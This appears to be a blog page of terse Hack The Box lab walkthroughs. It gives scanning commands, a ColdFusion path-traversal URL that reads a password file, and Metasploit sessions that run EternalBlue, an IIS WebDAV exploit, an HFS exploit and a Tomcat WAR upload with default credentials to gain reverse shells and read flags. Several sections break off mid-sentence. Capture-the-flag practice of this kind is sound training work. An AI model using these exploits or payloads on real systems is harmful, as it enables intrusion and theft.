HTB Arctic

$sudo nmap -A -T4 -p- 10.10.10.11
8500/tcp open fmtp?
This is an odd open port. Let’s check it.
Access to http://10.10.10.11:8500/
These files are part of a Cold Fusion 8 installation.
http://10.10.10.11:8500/CFIDE/administrator/
$searchsploit ColdFusion
$searchsploit -x 14641
Access to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
What is RDS? ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administrator and ColdFusion Studio to provide remote HTTP-access to files and databases. You can use RDS to manage

GIT Workflow

HTB Blocky

$nmap -T4 -p- -sV -A 10.10.10.37
Open Ports:
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open   minecraft Minecraft 1.11.2
http-generator: WordPress 4.8
$gobuster dir -u 10.10.10.37 -w /usr/share/wordlists/dirb/common.txt -e
PhpMyAdmin login site:
WordPress admin login site:
Uploads folder

HTB Granny

$nmap -T4 -A -sV -p- 10.10.10.15
$nmap -p 80 --script vuln 10.10.10.15
$gobuster dir -u 10.10.10.15 -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h 10.10.10.15
Based on Grandpa’s vulnerability…
msf5 > search CVE-2017-7269
msf5 > use 0
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
meterpreter > getuid
meterpreter > shell
c:\windows\system32\inetsrv>whoami
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > getpid
meterpreter > ps

HTB Grandpa

$nmap -T4 -sV -A -p- 10.10.10.14
Open Ports:
80/tcp open http Microsoft IIS httpd 6.0
This format seems to be an old version of IIS. According to https://es.wikipedia.org/wiki/Internet_Information_Services, we are working with a Windows Vista (Business and Ultimate only) and Windows Server 2008.
$gobuster dir -u 10.10.10.14 -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h 10.10.10.14
Seems that IIS 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (CVE-2017-7269). Let’s follow this path.
More information

HTB Bashed

$nmap -T4 -A -sV -p- 10.10.10.68
Access to http://10.10.10.68
$nikto -h 10.10.10.68
$gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirb/common.txt -e
www-data@bashed:/var/www/html/dev# cd /home/
www-data@bashed:/home# ls
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# cat user.txt
www-data@bashed:/var/www/html/dev# sudo -l
The command sudo -l reveals that the www-data user can run any command as scriptmanager. Running the command sudo -u scriptmanager bash -i will spawn a bash shell
www-data@bashed:/# ls -la
www-data@bashed:/# sudo cd scriptmanager
www-data@bashed

HTB Nibbles

$nmap -A -sV -T4 -p- 10.10.10.75
Open ports:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Access to http://10.10.10.75/
Do we have a /nibbleblog directory?
Access to http://10.10.10.75/nibbleblog/
$nikto -h http://10.10.10.75/nibbleblog/
Results:
OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access.

HTB Optimum

$nmap -A -sV -p- 10.10.10.8
$nikto -h 10.10.10.8
$searchsploit hfs
$cat /usr/share/exploitdb/exploits/windows/remote/346
msf5 > search hfs
msf5 > use 1
msf5 exploit(windows/http/rejetto_hfs_exec) > options
msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > run
meterpreter > ls
meterpreter > cat user.txt.txt
meterpreter > getuid
meterpreter > sysinfo
Sysinfo shows that we are on a Windows 2012 R2 server with an x64 architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV 10.10.10.40
Result analysis:
135: windows rpc
139: smb
445: smb
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
$nmap -p 445 --script vuln 10.10.10.40
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
C:\Windows\system32>whoami
C:\Users>dir
C:\Users>cd haris
C:\Users\haris>cd Desktop
C:\Users\haris\Desktop>dir
C:\Users\haris\Desktop>type user.txt
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn 10.10.10.95
$gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h 10.10.10.95:8080
Access to http://10.10.10.95:8080/manager/html
Use credentials found on Nikto’s results (tomcat/s3cret)
As we can observe, we are able to upload and deploy a WAR file.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > options
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf5 exploit(multi/http/tomcat_mgr_upload) > set